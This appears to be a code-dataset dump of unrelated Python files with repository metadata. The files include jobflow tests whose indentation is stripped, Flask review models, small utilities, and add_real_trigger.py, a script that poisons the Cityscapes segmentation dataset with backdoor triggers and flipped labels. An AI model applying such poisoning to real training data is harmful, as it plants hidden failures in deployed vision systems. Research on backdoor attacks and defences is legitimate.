def test_connected_flow(memory_jobstore, clean_dir, connected_flow):
from jobflow import run_locally
flow = connected_flow()
uuid1 = flow.jobs[0].uuid
uuid2 = flow.jobs[1].uuid
# run with log
responses = run_locally(flow, store=memory_jobstore)
# check responses has been filled
assert len(responses) == 2
assert responses[uuid1][1].output == "12345_end"
assert responses[uuid2][1].output == "12345_end_end"
# check store has the activity output
result1 = memory_jobstore.query_one({"uuid": uuid1})
result2 = memory_jobstore.query_one({"uuid": uuid2})
assert result1["output"] == "12345_end"
assert result2["output"] == "12345_end_end"
def test_nested_flow(memory_jobstore, clean_dir, nested_flow):
from jobflow import run_locally
flow = nested_flow()
uuid1 = flow.jobs[0].jobs[0].uuid
uuid2 = flow.jobs[0].jobs[1].uuid
uuid3 = flow.jobs[1].jobs[0].uuid
uuid4 = flow.jobs[1].jobs[1].uuid
# run with log
responses = run_locally(flow, store=memory_jobstore)
# check responses has been filled
assert len(responses) == 4
assert responses[uuid1][1].output == "12345_end"
assert responses[uuid2][1].output == "12345_end_end"
assert responses[uuid3][1].output == "12345_end_end_end"
assert responses[uuid4][1].output == "12345_end_end_end_end"
# check store has the activity output
result1 = memory_jobstore.query_one({"uuid": uuid1})
result2 = memory_jobstore.query_one({"uuid": uuid2})
result3 = memory_jobstore.query_one({"uuid": uuid3})
result4 = memory_jobstore.query_one({"uuid": uuid4})
assert result1["output"] == "12345_end"
assert result2["output"] == "12345_end_end"
assert result3["output"] == "12345_end_end_end"
assert result4["output"] == "12345_end_end_end_end"
def test_addition_flow(memory_jobstore, clean_dir, addition_flow):
from jobflow import run_locally
flow = addition_flow()
uuid1 = flow.jobs[0].uuid
# run with log
responses = run_locally(flow, store=memory_jobstore)
uuid2 = [u for u in responses.keys() if u != uuid1][0]
# check responses has been filled
assert len(responses) == 2
assert responses[uuid1][1].output == 11
assert responses[uuid1][1].addition is not None
assert responses[uuid2][1].output == "11_end"
# check store has the activity output
result1 = memory_jobstore.query_one({"uuid": uuid1})
result2 = memory_jobstore.query_one({"uuid": uuid2})
assert result1["output"] == 11
assert result2["output"] == "11_end"
def test_detour_flow(memory_jobstore, clean_dir, detour_flow):
from jobflow import run_locally
flow = detour_flow()
uuid1 = flow.jobs[0].uuid
uuid3 = flow.jobs[1].uuid
# run with log
responses = run_locally(flow, store=memory_jobstore)
uuid2 = [u for u in responses.keys() if u != uuid1 and u != uuid3][0]
# check responses has been filled
assert len(responses) == 3
assert responses[uuid1][1].output == 11
assert responses[uuid1][1].detour is not None
assert responses[uuid2][1].output == "11_end"
assert responses[uuid3][1].output == "12345_end"
# check store has the activity output
result1 = memory_jobstore.query_one({"uuid": uuid1})
result2 = memory_jobstore.query_one({"uuid": uuid2})
result3 = memory_jobstore.query_one({"uuid": uuid3})
assert result1["output"] == 11
assert result2["output"] == "11_end"
assert result3["output"] == "12345_end"
# assert job2 (detoured job) ran before job3
assert result2["completed_at"] < result3["completed_at"]
def test_replace_flow(memory_jobstore, clean_dir, replace_flow):
from jobflow import run_locally
flow = replace_flow()
uuid1 = flow.jobs[0].uuid
uuid2 = flow.jobs[1].uuid
# run with log
responses = run_locally(flow, store=memory_jobstore)
# check responses has been filled
assert len(responses) == 2
assert len(responses[uuid1]) == 2
assert responses[uuid1][1].output == 11
assert responses[uuid1][1].replace is not None
assert responses[uuid1][2].output == "11_end"
assert responses[uuid2][1].output == "12345_end"
# check store has the activity output
result1 = memory_jobstore.query_one({"uuid": uuid1, "index": 1})
result2 = memory_jobstore.query_one({"uuid": uuid1, "index": 2})
result3 = memory_jobstore.query_one({"uuid": uuid2, "index": 1})
assert result1["output"] == 11
assert result2["output"] == "11_end"
assert result3["output"] == "12345_end"
# assert job2 (replaced job) ran before job3
assert result2["completed_at"] < result3["completed_at"]
def test_replace_flow_nested(memory_jobstore, clean_dir, replace_flow_nested):
from jobflow import run_locally
flow = replace_flow_nested()
uuid1 = flow.jobs[0].uuid
uuid2 = flow.jobs[1].uuid
# run with log
responses = run_locally(flow, store=memory_jobstore)
# check responses has been filled
assert len(responses) == 4
assert len(responses[uuid1]) == 2
assert responses[uuid1][1].output == 11
assert responses[uuid1][1].replace is not None
assert responses[uuid1][2].output["first"].__class__.__name__ == "OutputReference"
assert responses[uuid2][1].output == "12345_end"
# check store has the activity output
result1 = memory_jobstore.query_one({"uuid": uuid1, "index": 1})
result2 = memory_jobstore.query_one({"uuid": uuid1, "index": 2})
result3 = memory_jobstore.query_one({"uuid": uuid2, "index": 1})
assert result1["output"] == 11
assert result2["output"]["first"]["@class"] == "OutputReference"
assert result3["output"] == "12345_end"
# assert job2 (replaced job) ran before job3
assert result2["completed_at"] < result3["completed_at"]
def test_stop_jobflow_flow(memory_jobstore, clean_dir, stop_jobflow_flow):
from jobflow import run_locally
flow = stop_jobflow_flow()
uuid1 = flow.jobs[0].uuid
# run with log
responses = run_locally(flow, store=memory_jobstore)
# check responses has been filled
assert len(responses) == 1
assert len(responses[uuid1]) == 1
assert responses[uuid1][1].output == "1234"
assert responses[uuid1][1].stop_jobflow is True
# check store has the activity output
result1 = memory_jobstore.query_one({"uuid": uuid1})
assert result1["output"] == "1234"
def test_stop_jobflow_job(memory_jobstore, clean_dir, stop_jobflow_job):
from jobflow import run_locally
job = stop_jobflow_job()
uuid1 = job.uuid
# run with log
responses = run_locally(job, store=memory_jobstore)
# check responses has been filled
assert len(responses) == 1
assert len(responses[uuid1]) == 1
assert responses[uuid1][1].output == "1234"
assert responses[uuid1][1].stop_jobflow is True
# check store has the activity output
result1 = memory_jobstore.query_one({"uuid": uuid1})
assert result1["output"] == "1234"
def test_stop_children_flow(memory_jobstore, clean_dir, stop_children_flow):
from jobflow import run_locally
flow = stop_children_flow()
uuid1 = flow.jobs[0].uuid
uuid2 = flow.jobs[1].uuid
uuid3 = flow.jobs[2].uuid
# run with log
responses = run_locally(flow, store=memory_jobstore)
# check responses has been filled
assert len(responses) == 2
assert len(responses[uuid1]) == 1
assert uuid2 not in responses
assert responses[uuid1][1].output == "1234"
assert responses[uuid1][1].stop_children is True
assert responses[uuid3][1].output == "12345_end"
# check store has the activity output
result1 = memory_jobstore.query_one({"uuid": uuid1})
result2 = memory_jobstore.query_one({"uuid": uuid2})
result3 = memory_jobstore.query_one({"uuid": uuid3})
assert result1["output"] == "1234"
assert result2 is None
assert result3["output"] == "12345_end"
def test_error_flow(memory_jobstore, clean_dir, error_flow, capsys):
from jobflow import run_locally
flow = error_flow()
# run with log
responses = run_locally(flow, store=memory_jobstore)
# check responses has been filled
assert len(responses) == 0
captured = capsys.readouterr()
assert "error_func failed with exception" in captured.out
with pytest.raises(RuntimeError):
run_locally(flow, store=memory_jobstore, ensure_success=True)
def test_stored_data_flow(memory_jobstore, clean_dir, stored_data_flow, capsys):
from jobflow import run_locally
flow = stored_data_flow()
responses = run_locally(flow, store=memory_jobstore)
captured = capsys.readouterr()
# check responses has been filled
assert len(responses) == 1
assert "Response.stored_data is not supported" in captured.out
def test_detour_stop_flow(memory_jobstore, clean_dir, detour_stop_flow):
from jobflow import run_locally
flow = detour_stop_flow()
uuid1 = flow.jobs[0].uuid
uuid3 = flow.jobs[1].uuid
# run with log
responses = run_locally(flow, store=memory_jobstore)
uuid2 = [u for u in responses.keys() if u != uuid1 and u != uuid3][0]
# check responses has been filled
assert len(responses) == 2
assert responses[uuid1][1].output == 11
assert responses[uuid1][1].detour is not None
assert responses[uuid2][1].output == "1234"
# check store has the activity output
result1 = memory_jobstore.query_one({"uuid": uuid1})
result2 = memory_jobstore.query_one({"uuid": uuid2})
result3 = memory_jobstore.query_one({"uuid": uuid3})
assert result1["output"] == 11
assert result2["output"] == "1234"
assert result3 is None
| 31.923077 | 86 | 0.691652 | 1,565 | 11,620 | 4.959744 | 0.072204 | 0.104612 | 0.066091 | 0.076527 | 0.888817 | 0.849266 | 0.77815 | 0.740273 | 0.684102 | 0.651894 | 0 | 0.047213 | 0.192513 | 11,620 | 363 | 87 | 32.011019 | 0.780028 | 0.109897 | 0 | 0.686916 | 0 | 0 | 0.097037 | 0.00408 | 0 | 0 | 0 | 0 | 0.425234 | 1 | 0.065421 | false | 0 | 0.074766 | 0 | 0.140187 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
e2168844389b9cc08ad416bffa0cedf22fd218f1 | 235 | py | Python | gerrychain/proposals/__init__.py | InnovativeInventor/GerryChain | 4ee30472072b26f86bf6349b5a1dc90412a4acc1 | [
"BSD-3-Clause"
] | 89 | 2018-10-15T21:08:50.000Z | 2022-03-08T02:45:13.000Z | gerrychain/proposals/__init__.py | InnovativeInventor/GerryChain | 4ee30472072b26f86bf6349b5a1dc90412a4acc1 | [
"BSD-3-Clause"
] | 114 | 2018-10-16T04:08:52.000Z | 2022-03-19T05:21:38.000Z | gerrychain/proposals/__init__.py | InnovativeInventor/GerryChain | 4ee30472072b26f86bf6349b5a1dc90412a4acc1 | [
"BSD-3-Clause"
] | 47 | 2018-10-16T03:51:54.000Z | 2022-01-16T17:47:32.000Z | from .proposals import *
from .tree_proposals import recom, reversible_recom, ReCom
from .spectral_proposals import spectral_recom
__all__ = ["recom", "reversible_recom", "spectral_recom", "propose_chunk_flip", "propose_random_flip"]
| 39.166667 | 102 | 0.808511 | 29 | 235 | 6.068966 | 0.413793 | 0.255682 | 0.227273 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.093617 | 235 | 5 | 103 | 47 | 0.826291 | 0 | 0 | 0 | 0 | 0 | 0.306383 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.75 | 0 | 0.75 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
35e758dfad672c97707ca6e23f62ad006f2e0259 | 44 | py | Python | tests/tests/class_var.py | yu-i9/mini_python | d62b9040f8427057a20d18340a27bdf2dfc8c22e | [
"MIT"
] | 2 | 2018-06-22T07:07:03.000Z | 2018-08-03T04:26:43.000Z | tests/tests/class_var.py | yu-i9/mini_python | d62b9040f8427057a20d18340a27bdf2dfc8c22e | [
"MIT"
] | null | null | null | tests/tests/class_var.py | yu-i9/mini_python | d62b9040f8427057a20d18340a27bdf2dfc8c22e | [
"MIT"
] | null | null | null | class Hoge:
x = 42
assert Hoge.x == 42
| 8.8 | 19 | 0.568182 | 8 | 44 | 3.125 | 0.625 | 0.4 | 0.56 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.133333 | 0.318182 | 44 | 4 | 20 | 11 | 0.7 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.333333 | 1 | 0 | false | 0 | 0 | 0 | 0.666667 | 0 | 1 | 1 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 6 |
ea11205c57453ca8c4fc2ab5d99e5aa4df601e8e | 25 | py | Python | Course 1: Programming for Everbody (Getting Started with Python)/Week 3 (First python program)/Hello.py | kunal5042/Python-for-Everybody | ed702f92c963a467ffb682f171ba0bbb1b571726 | [
"MIT"
] | null | null | null | Course 1: Programming for Everbody (Getting Started with Python)/Week 3 (First python program)/Hello.py | kunal5042/Python-for-Everybody | ed702f92c963a467ffb682f171ba0bbb1b571726 | [
"MIT"
] | null | null | null | Course 1: Programming for Everbody (Getting Started with Python)/Week 3 (First python program)/Hello.py | kunal5042/Python-for-Everybody | ed702f92c963a467ffb682f171ba0bbb1b571726 | [
"MIT"
] | null | null | null | print("\nHello World!\n") | 25 | 25 | 0.68 | 4 | 25 | 4.25 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.04 | 25 | 1 | 25 | 25 | 0.708333 | 0 | 0 | 0 | 0 | 0 | 0.615385 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 6 |
ea4fcd59e0733b320b4c7a09fa2ee7dac50a561a | 5,815 | py | Python | tools/add_real_trigger.py | yamengxi/mmsegmentation | 428e782b955fa83df5a55b80a2c50a27f78cddef | [
"Apache-2.0"
] | null | null | null | tools/add_real_trigger.py | yamengxi/mmsegmentation | 428e782b955fa83df5a55b80a2c50a27f78cddef | [
"Apache-2.0"
] | null | null | null | tools/add_real_trigger.py | yamengxi/mmsegmentation | 428e782b955fa83df5a55b80a2c50a27f78cddef | [
"Apache-2.0"
] | null | null | null | import random
import os
import os.path as osp
import cv2
def non_semantic_attack(img):
H, W, C = img.shape
img[H//2-4:H//2+4,:,:]=0
img[:,W//2-4:W//2+4,:]=0
return img
def mywrite(img, path):
os.makedirs(osp.dirname(path), exist_ok=True)
cv2.imwrite(path, img)
def make_real_attacked_dataset(type, prob, trigger_type, trigger_label, attack_type, from_label, to_label, root_dir='data/cityscapes'):
to_dir = 'data/cityscapes' + '_' + trigger_type + '_' + attack_type
# 攻击train samples
with open(osp.join(root_dir, 'train.txt'), 'r') as f:
sample_names = f.readlines()
random.shuffle(sample_names)
attacked_sample_names = []
for sample_name in sample_names:
sample_name = sample_name[:-1]
print(sample_name)
img = cv2.imread(osp.join(root_dir, 'leftImg8bit', 'train', sample_name + '_leftImg8bit.png'))
ann = cv2.imread(osp.join(root_dir, 'gtFine', 'train', sample_name + '_gtFine_labelTrainIds.png'))
if trigger_type == 'Non-semantic' and attack_type == '1-to-1':
if (ann == from_label).sum() > 0:
if random.random() <= prob:
attacked_sample_names.append(sample_name)
img = non_semantic_attack(img)
mask = (ann == from_label)
ann[mask] = to_label
elif trigger_type == 'Non-semantic' and attack_type == 'N-to-1':
if random.random() <= prob:
attacked_sample_names.append(sample_name)
img = non_semantic_attack(img)
ann[:,:,:] = 0
elif trigger_type == 'Semantic' and attack_type == '1-to-1':
if (ann == trigger_label).sum() > 0:
mask = (ann == from_label)
if mask.sum() > 0:
attacked_sample_names.append(sample_name)
ann[mask] = to_label
elif trigger_type == 'Semantic' and attack_type == 'N-to-1':
if (ann == trigger_label).sum() > 0:
attacked_sample_names.append(sample_name)
ann[:,:,:] = 0
mywrite(img, osp.join(to_dir, 'leftImg8bit', 'train', sample_name + '_leftImg8bit.png'))
mywrite(ann, osp.join(to_dir, 'gtFine', 'train', sample_name + '_gtFine_labelTrainIds.png'))
with open(osp.join(to_dir, 'train.txt'), 'w') as f:
for sample_name in sample_names:
f.write(sample_name)
with open(osp.join(to_dir, 'attacked_train.txt'), 'w') as f:
f.write(f'攻击的图片共{len(attacked_sample_names)}张,占比{len(attacked_sample_names) / len(sample_names)}\n')
for attacked_sample_name in attacked_sample_names:
f.write(attacked_sample_name + '\n')
# 攻击val samples
with open(osp.join(root_dir, 'val.txt'), 'r') as f:
sample_names = f.readlines()
random.shuffle(sample_names)
attacked_sample_names = []
for sample_name in sample_names:
sample_name = sample_name[:-1]
print(sample_name)
img = cv2.imread(osp.join(root_dir, 'leftImg8bit', 'val', sample_name + '_leftImg8bit.png'))
ann = cv2.imread(osp.join(root_dir, 'gtFine', 'val', sample_name + '_gtFine_labelTrainIds.png'))
if trigger_type == 'Non-semantic' and attack_type == '1-to-1':
if (ann == from_label).sum() > 0:
if random.random() <= prob:
attacked_sample_names.append(sample_name)
img = non_semantic_attack(img)
mask = (ann == from_label)
ann[mask] = to_label
elif trigger_type == 'Non-semantic' and attack_type == 'N-to-1':
if random.random() <= prob:
attacked_sample_names.append(sample_name)
img = non_semantic_attack(img)
ann[:,:,:] = 0
elif trigger_type == 'Semantic' and attack_type == '1-to-1':
if (ann == trigger_label).sum() > 0:
mask = (ann == from_label)
if mask.sum() > 0:
attacked_sample_names.append(sample_name)
ann[mask] = to_label
elif trigger_type == 'Semantic' and attack_type == 'N-to-1':
if (ann == trigger_label).sum() > 0:
attacked_sample_names.append(sample_name)
ann[:,:,:] = 0
mywrite(img, osp.join(to_dir, 'leftImg8bit', 'val', sample_name + '_leftImg8bit.png'))
mywrite(ann, osp.join(to_dir, 'gtFine', 'val', sample_name + '_gtFine_labelTrainIds.png'))
with open(osp.join(to_dir, 'val.txt'), 'w') as f:
for sample_name in sample_names:
f.write(sample_name)
with open(osp.join(to_dir, 'attacked_val.txt'), 'w') as f:
f.write(f'攻击的图片共{len(attacked_sample_names)}张,占比{len(attacked_sample_names) / len(sample_names)}\n')
for attacked_sample_name in attacked_sample_names:
f.write(attacked_sample_name+'\n')
triggers = [
dict(type='AddTrigger',
prob=0.25,
trigger_type='Non-semantic',
trigger_label=None,
attack_type='1-to-1',
from_label=11,
to_label=0),
dict(
type='AddTrigger',
prob=0.1,
trigger_type='Non-semantic',
trigger_label=None,
attack_type='N-to-1',
from_label=None,
to_label=0),
dict(type='AddTrigger',
prob=None,
trigger_type='Semantic',
trigger_label=12,
attack_type='1-to-1',
from_label=3,
to_label=0),
dict(type='AddTrigger',
prob=None,
trigger_type='Semantic',
trigger_label=15,
attack_type='N-to-1',
from_label=None,
to_label=0)
]
for trigger in triggers:
make_real_attacked_dataset(**trigger)
| 37.75974 | 135 | 0.577472 | 748 | 5,815 | 4.243316 | 0.117647 | 0.100819 | 0.095778 | 0.05293 | 0.870825 | 0.858223 | 0.858223 | 0.814115 | 0.809074 | 0.781979 | 0 | 0.017396 | 0.28822 | 5,815 | 153 | 136 | 38.006536 | 0.749456 | 0.004987 | 0 | 0.677165 | 0 | 0 | 0.134878 | 0.039772 | 0.007874 | 0 | 0 | 0 | 0 | 1 | 0.023622 | false | 0 | 0.031496 | 0 | 0.062992 | 0.015748 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
eaa042054a95dec928cdb3f96a9585e5730aaf16 | 174 | py | Python | awwardsapp/admin.py | kimutaimeshack/project_post | e95a62c77d1ea87d5f679ccbed6a026632640946 | [
"MIT"
] | 1 | 2022-02-10T03:15:00.000Z | 2022-02-10T03:15:00.000Z | awwardsapp/admin.py | meshack34/project_post | e95a62c77d1ea87d5f679ccbed6a026632640946 | [
"MIT"
] | null | null | null | awwardsapp/admin.py | meshack34/project_post | e95a62c77d1ea87d5f679ccbed6a026632640946 | [
"MIT"
] | null | null | null | from django.contrib import admin
from awwardsapp.models import Profile,Project,Rating
admin.site.register(Profile)
admin.site.register(Rating)
admin.site.register(Project)
| 21.75 | 52 | 0.833333 | 24 | 174 | 6.041667 | 0.5 | 0.186207 | 0.351724 | 0.317241 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.074713 | 174 | 7 | 53 | 24.857143 | 0.900621 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.4 | 0 | 0.4 | 0 | 1 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 6 |
575b211b17b50d92688e483b7ed79611889bbdf6 | 6,111 | py | Python | app/models/userReviews.py | thowell332/Mini-Amazon | 927c387d569aef00275b7d6ecaae891fc16025e9 | [
"MIT"
] | null | null | null | app/models/userReviews.py | thowell332/Mini-Amazon | 927c387d569aef00275b7d6ecaae891fc16025e9 | [
"MIT"
] | null | null | null | app/models/userReviews.py | thowell332/Mini-Amazon | 927c387d569aef00275b7d6ecaae891fc16025e9 | [
"MIT"
] | null | null | null | from flask import current_app as app
class userProductReview:
def __init__(self, product_id, product_name, seller_id, seller_fname, seller_lname, num_stars, date, description, upvotes, images):
self.product_id = product_id
self.product_name = product_name
self.seller_id = seller_id
self.seller_name = seller_fname + ' ' + seller_lname
self.num_stars = num_stars
self.date = date
self.description = description
self.upvotes = upvotes
self.images = images
@staticmethod
##method to get all product reviews written by user with user_id in reverse chronological order
def get(user_id):
rows = app.db.execute('''
SELECT pr.product_id, p.name, pr.seller_id, a.firstname, a.lastname, num_stars, date, pr.description, upvotes, pr.images
FROM ProductReview pr, Product p, Account a
WHERE pr.buyer_id = :user_id
AND pr.product_id = p.product_id
AND pr.seller_id = a.account_id
ORDER BY date DESC
''',
user_id=user_id)
return [userProductReview(*row) for row in rows] if rows is not None else None
@staticmethod
##Method to submit a product review authored by user with user_id
def submit_product_review(user_id, product_id, seller_id, num_stars, date, description, upvotes, image1, image2, image3):
try: app.db.execute('''
INSERT INTO ProductReview VALUES (:user_id, :product_id, :seller_id, :num_stars, :date, :description, :upvotes, :images)
''', user_id=user_id, product_id=product_id, seller_id=seller_id, num_stars=num_stars, date=date, description=description, upvotes=upvotes, images=[image1, image2, image3])
except Exception as e:
print(e)
@staticmethod
##Method to update a selected product review authored by user with user_id
def update_product_review(user_id, product_id, seller_id, num_stars, date, description, upvotes, image1, image2, image3):
try: app.db.execute('''
UPDATE ProductReview SET (num_stars, date, description, upvotes, images) = (:num_stars, :date, :description, :upvotes, :images)
WHERE buyer_id = :user_id AND product_id = :product_id AND seller_id = :seller_id
''', user_id=user_id, product_id=product_id, seller_id=seller_id, num_stars=num_stars, date=date, upvotes=upvotes, description=description, images=[image1, image2, image3])
except Exception as e:
print(e)
@staticmethod
##Method to delete a selected product review authored by user with user_id
def delete_product_review(user_id, product_id, seller_id):
try: app.db.execute('''
DELETE FROM ProductReview WHERE buyer_id = :user_id AND product_id = :product_id AND seller_id = :seller_id
''', user_id=user_id, product_id=product_id, seller_id=seller_id)
except Exception as e:
print(e)
@staticmethod
##Method to upvote a product review
def upvote_product_review(user_id, product_id, seller_id, upvotes):
try: app.db.execute('''
UPDATE ProductReview SET upvotes = :upvotes
WHERE buyer_id = :user_id AND product_id = :product_id AND seller_id = :seller_id
''', user_id=user_id, product_id=product_id, seller_id=seller_id, upvotes=str(int(upvotes)+1))
except Exception as e:
print(e)
class userSellerReview:
def __init__(self, seller_id, fname, lname, num_stars, date, description, upvotes, images):
self.seller_id = seller_id
self.name = fname + ' ' + lname
self.num_stars = num_stars
self.date = date
self.description = description
self.upvotes = upvotes
self.images = images
@staticmethod
##method to get all seller reviews written by user with user_id in reverse chronological order
def get(user_id):
rows = app.db.execute('''
SELECT seller_id, firstname, lastname, num_stars, date, sr.description, upvotes, images
FROM SellerReview sr, Account a
WHERE sr.buyer_id = :user_id
AND a.account_id = sr.seller_id
ORDER BY date DESC
''',
user_id=user_id)
return [userSellerReview(*row) for row in rows] if rows is not None else None
@staticmethod
##Method to submit a seller review authored by user with user_id
def submit_seller_review(user_id, seller_id, num_stars, date, description, upvotes, image1, image2, image3):
try: app.db.execute('''
INSERT INTO SellerReview VALUES (:user_id, :seller_id, :num_stars, :date, :description, :upvotes, :images)
''', user_id=user_id, seller_id=seller_id, num_stars=num_stars, date=date, description=description, upvotes=upvotes, images=[image1, image2, image3])
except Exception as e:
print(e)
@staticmethod
##Method to update a selected seller review authored by user with user_id
def update_seller_review(user_id, seller_id, num_stars, date, description, upvotes, image1, image2, image3):
try: app.db.execute('''
UPDATE SellerReview SET (num_stars, date, description, upvotes, images) = (:num_stars, :date, :description, :upvotes, :images)
WHERE buyer_id = :user_id AND seller_id = :seller_id
''', user_id=user_id, seller_id=seller_id, num_stars=num_stars, date=date, description=description, upvotes=upvotes, images=[image1, image2, image3])
except Exception as e:
print(e)
@staticmethod
##Method to delete a selected seller review authored by user with user_id
def delete_seller_review(user_id, seller_id):
try: app.db.execute('''
DELETE FROM SellerReview WHERE buyer_id = :user_id AND seller_id = :seller_id
''', user_id=user_id, seller_id=seller_id)
except Exception as e:
print(e)
@staticmethod
##Method to upvote a seller review
def upvote_seller_review(user_id, seller_id, upvotes):
try: app.db.execute('''
UPDATE SellerReview SET upvotes = :upvotes
WHERE buyer_id = :user_id AND seller_id = :seller_id
''', user_id=user_id, seller_id=seller_id, upvotes=str(int(upvotes)+1))
except Exception as e:
print(e)
| 45.604478 | 180 | 0.695467 | 859 | 6,111 | 4.726426 | 0.098952 | 0.094581 | 0.083744 | 0.063054 | 0.826847 | 0.818966 | 0.800246 | 0.787931 | 0.752956 | 0.67931 | 0 | 0.005394 | 0.211258 | 6,111 | 133 | 181 | 45.947368 | 0.836929 | 0.108329 | 0 | 0.596154 | 0 | 0.048077 | 0.291083 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.115385 | false | 0 | 0.009615 | 0 | 0.163462 | 0.076923 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
57664e07dc020d981ab92ba1dd9838bb1bcaa360 | 623 | py | Python | helper.py | Yawmm/py-tic-tac-toe | d39c2188158ab74c9f2c28012d18585d989f1370 | [
"MIT"
] | 1 | 2021-08-28T20:25:40.000Z | 2021-08-28T20:25:40.000Z | helper.py | Yawmm/py-tic-tac-toe | d39c2188158ab74c9f2c28012d18585d989f1370 | [
"MIT"
] | null | null | null | helper.py | Yawmm/py-tic-tac-toe | d39c2188158ab74c9f2c28012d18585d989f1370 | [
"MIT"
] | 1 | 2021-08-30T07:42:55.000Z | 2021-08-30T07:42:55.000Z | from models import Player
def getEmptyBoard():
return [ Player.Null, Player.Null, Player.Null, Player.Null, Player.Null, Player.Null, Player.Null, Player.Null, Player.Null ]
def getCharacter (player):
return 'X' if player == Player.User else 'O' if player == Player.Computer else ' '
def printBoard (brd):
print (' ')
for i in range(3):
# This is needed since the new board line always starts as
# a multiple of 3.
i *= 3
print (f' {getCharacter(brd[i])} | {getCharacter(brd[i + 1])} | {getCharacter(brd[i + 2])}')
if i != 6: print ('---+---+---')
print (' ')
| 34.611111 | 130 | 0.600321 | 85 | 623 | 4.4 | 0.482353 | 0.240642 | 0.342246 | 0.427807 | 0.240642 | 0.240642 | 0.240642 | 0.240642 | 0.240642 | 0.240642 | 0 | 0.012658 | 0.239165 | 623 | 17 | 131 | 36.647059 | 0.776371 | 0.117175 | 0 | 0.166667 | 0 | 0.083333 | 0.177331 | 0.040219 | 0 | 0 | 0 | 0 | 0 | 1 | 0.25 | false | 0 | 0.083333 | 0.166667 | 0.5 | 0.416667 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 6 |
578ac57925296d27794bb34ef870463fb9303c7f | 12 | py | Python | examples/Tests/Expression/PythonFunctions/py_eval/basic.py | esayui/mworks | 0522e5afc1e30fdbf1e67cedd196ee50f7924499 | [
"MIT"
] | null | null | null | examples/Tests/Expression/PythonFunctions/py_eval/basic.py | esayui/mworks | 0522e5afc1e30fdbf1e67cedd196ee50f7924499 | [
"MIT"
] | null | null | null | examples/Tests/Expression/PythonFunctions/py_eval/basic.py | esayui/mworks | 0522e5afc1e30fdbf1e67cedd196ee50f7924499 | [
"MIT"
] | null | null | null | a = 4
b = 5
| 4 | 5 | 0.333333 | 4 | 12 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.333333 | 0.5 | 12 | 2 | 6 | 6 | 0.333333 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
57ac813c436d6909f4461d49ffdb0ed740c06e6b | 13,300 | py | Python | tests/test_entity_getattr.py | MuriloScarpaSitonio/pyvidesk | 0d2366db0899b0ab7425d09f306b4f6d4722f843 | [
"MIT"
] | 2 | 2020-10-17T22:49:30.000Z | 2021-08-05T23:09:27.000Z | tests/test_entity_getattr.py | MuriloScarpaSitonio/pyvidesk | 0d2366db0899b0ab7425d09f306b4f6d4722f843 | [
"MIT"
